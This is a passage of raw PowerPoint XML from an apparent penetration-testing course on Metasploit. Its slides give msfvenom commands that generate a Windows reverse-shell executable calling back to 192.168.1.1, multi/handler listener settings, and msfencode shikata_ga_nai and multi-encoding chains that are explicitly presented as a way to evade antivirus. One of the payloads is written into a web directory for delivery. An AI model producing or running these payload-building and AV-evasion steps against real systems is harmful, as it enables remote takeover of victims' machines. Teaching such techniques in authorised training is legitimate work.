              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6014B0A3-9156-27FB-6244-F3B830A3A8B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="815546" y="2001795"/>
            <a:ext cx="10849232" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>shell_reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>shell_reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> LHOST=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>192.168.1.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> LPORT=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4444</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>  &gt;&gt; exploit.exe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Open Metasploit Multi Handler Session </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msfconsoe </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>use exploit/multi/handler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>set PAYLOAD windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>shell_reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>set LHOST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>192.168.1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>set LPORT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>31337</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1999288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95BC9-0BA3-69B1-0906-1EF2BE18984F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="135924" y="148282"/>
            <a:ext cx="3587842" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Encoding with MSFencode</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9718230D-C425-6361-395C-B3F31E1A7132}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1606378" y="671502"/>
            <a:ext cx="10238700" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>One of the best ways to avoid being stopped by antivirus software is to encode our payload with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>msfencode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Msfencode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> is a useful tool that alters the code in an executable</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6ECC5333-4D5D-6BD8-3DAA-87ED347EC6B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="135924" y="1687382"/>
            <a:ext cx="609805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MSFencode Options </a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80B67B88-BDB1-C30E-3C02-D621BDF1799F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1345988" y="2210819"/>
            <a:ext cx="1838965" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msfencode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -l</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D29F7830-93B4-BEF2-5A61-1B6F1D882A48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="932660" y="2905780"/>
            <a:ext cx="550151" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>EX:</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{384CAEDD-69B9-11D8-09F8-7927C6B796E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207734" y="3429000"/>
            <a:ext cx="10637344" cy="1005927"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3815B35E-73F4-E61C-685F-0C8EFA251013}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207734" y="3467202"/>
            <a:ext cx="12705835" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>root@bt:/# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>shell_reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> LHOST=192.168.1.1 LPORT=4444 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>msfencode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> -e x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>shikata_ga_nai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> Y -t exe Z &gt; /var/www/payload2.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>[*] x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>shikata_ga_nai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> succeeded with size 342 (iteration=1)</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{788E452B-3C3D-689B-1B57-F0E8184C07F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="265971" y="4496482"/>
            <a:ext cx="2433680"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effectLst/>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Multi-encoding</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91AF5CB7-7657-709E-BA95-936F5EECA0B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207734" y="5019702"/>
            <a:ext cx="10637344" cy="1564594"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{192A7870-185D-E1E3-E4BD-9C6772B26D9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1434896" y="5078147"/>
            <a:ext cx="10524035" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root@bt:/opt/framework3/msf3# sudo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> windows/meterpreter/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LHOST=192.168.1.101 LPORT=31337 R | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msfencode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -e x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shikata_ga_nai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -c 5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>X</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-t raw </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msfencode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -e x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>alpha_upper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -c 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-t raw | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msfencode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -e</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shikata_ga_nai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -c 5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>[ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-t raw | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msfencode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
